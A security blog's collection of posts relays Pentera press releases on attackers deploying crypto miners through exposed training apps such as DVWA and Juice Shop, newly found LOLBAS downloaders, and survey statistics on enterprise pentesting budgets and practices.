The IT Nerd

Hackers are exploiting securing training applications, including open-source projects such as OWASP Juice Shop, DVWA, and Hackazon, to breach the customer managed cloud environments of Fortune 500 companies and security vendors.

More details can be found here: https://pentera.io/press-release/cloud-training-environments-exploited-crypto-miners/

Martin Jartelius, AI Product Director at Outpost24, provided the following comments:

“In security, it is important to refrain from victim blaming. However, when something is designed to be inherently unsafe, deployed as-is, and exposed directly to the internet, it is not even hacking in the traditional sense. Someone simply built a scanner to look for these applications, just as they do for regularly vulnerable ones, and deployed crypto miners.

What can we deduce from this? Attackers go where the value is—and today, that value is primarily in data. When attackers instead revert to deploying miners, it suggests that these systems sit in isolated networks of little value, most likely test beds for tools or teams. Embarrassing, annoying, and somewhat costly—but, even against my own principle of not blaming the victim, this should not come as a surprise to whoever put it there when it happens.”

This illustrates how quickly the bad guys can pivot in terms of finding new and creative ways to pwn their victims. Which means defenders need to find new and creative ways to match those pivots in order to not get pwned.

Pentera, the market leader in automated security validation, today announced the release of its fourth annual State of Pentesting survey report. Pentera surveyed 500 CISOs and senior security executives from enterprises with more than 3,000 employees across the United States, Germany, France, and the United Kingdom. The 2025 report offers data-driven analysis on the current state of security validation practices, budget priorities, and the key factors influencing the adoption of proactive risk management strategies.

Unthinkable a decade ago, today over 50% of enterprise CISOs report using software-based pentesting to support their in-house testing practices. Even more notable, 50% of CISOs now identify software-based testing as a primary method for uncovering exploitable security gaps within their organizations. These trends signal a broader shift toward testing approaches that offer greater scale, cover the full attack surface, and enable continuous validation of the enterprise.

Key findings from the report include:

• 67% of US Enterprises Experienced a Breach in the Past 24 Months – Enterprise CISOs manage an average of 75 security tools across their IT environments, with 45% reporting stack growth over the past year. Despite these investments, 67% experienced a breach in the past 24 months, underscoring the persistent challenges of securing complex environments.
• Large Security Stacks: Increased Vulnerability Data Volume – While a larger security stack increases visibility of potential issues, it also increases operational complexity, making it harder to prioritize and respond to the most critical threats. Organizations with 11–50 security tools generate an average of 883 alerts per week. Enterprises with 76–100 tools face over 2,048 alerts weekly, while those with more than 101 tools see an average of 3,074 alerts.
• Pentesting Represents Around 11% of the Total IT Security Budget – US enterprises spend an average of $187,000 annually on pentesting which is about 10.5% of their total IT security budgets. IT Security budgets are on the rise: Over 50% of CISOs report that they will be raising their pentesting budgets in 2025 and 48% will be raising their overall IT security budgets.
• Software-based pentesting is gaining traction – 55% of enterprises now use software-based tools to support in-house testing programs, and 50% of CISOs cite software-based testing as a primary method for uncovering exploitable security gaps within their IT environments. This reflects a growing trust in the safety of software solutions. Enterprises are shifting toward scalable adversarial testing approaches.
• Cyber Insurance Providers are a NEW Driving Force for Technology Adoption – Cyber insurance providers are driving security control technology adoption. In the US 58% of enterprises have implemented at least one cybersecurity solution at the request of their insurance provider. An additional 34% reported receiving recommendations for specific solutions.
• Confidence in Government Support Is Not High – 22% of CISOs say they cannot rely on the government for cybersecurity support at all. Another 64% of US enterprises acknowledge government actions, but believe these efforts are insufficient. Only 14% believe the government is truly doing its part to help protect the private sector.

The survey was conducted by Global Surveyz, an independent research firm, from December 2024 through January 2025.

Click here to access the full report.

Here’s a look at groundbreaking research published by  Cybersecurity Unicorn Pentera, highlighting 12 new LOLBAS (Living-Off-the-Land Binaries-And-Scripts) files uncovered by Pentera security researchers.

From draining bank accounts to bypassing Windows OS security features, LOLBAS attacks continue to be a popular technique amongst hackers, and with more than 3000 binary files on Windows, discovering new LOLBAS can be challenging.

Hackers utilize these scripts to stay under the radar, exploiting legitimate tools for malicious activities. As a result of Pentera’s unique automation-driven approach, they were able to increase the number of known LOLBAS downloaders in the years-old project by 30% in just four weeks.

You can read the research here.

Pentera has released the findings of its second annual industry survey: The State of Pentesting 2023. Pentera undertook this research to understand the current state of security validation practices and investment in enterprises.

Pentera surveyed 300 CIOs, CISOs and security executives from enterprises across Europe and the USA. The report provides insights on current IT and security budgets, cyber security validation practices, and how cyber exposure is being managed, while showing differences between the regions and enterprise sizes.  

Report highlights include:

• Despite large investments in Defense-in-Depth strategies, 88% of organizations have suffered recent attacks – On average, companies have almost 44 security solutions in place, indicating a defense-in-depth strategy, where multiple security solutions are layered to best protect critical assets. However, despite the large number of security solutions implemented, 88% of organizations have admitted to being compromised by a cyber attack over the past two years. 
• Cybersecurity budgets aren’t impacted by the financial slowdown – Despite the recent global economic slowdown, cybersecurity budgets are not expected to be impacted in 2023. 92% of organizations are reporting a raise of their IT security budgets, and 86% are reporting a raise of budget for pentesting specifically. 
• The drivers for  pentesting have evolved beyond regulations – While the need for pentesting originated with regulatory requirements, the top-of-mind motivations for pentesting today are security validation, threat potential damage impact assessment and cyber insurance. With only 22% of respondents citing compliance as their primary motivation for the practice, regulatory or executive mandates are still impactful, but not the primary rationale driving pentesting.   

The results of the report will be presented by Aviv Cohen at Pentera’s XPOSURE Summit on March 1, 2023. The summit focuses on actionable methodologies for developing and executing successful Exposure Management strategies. Register online here.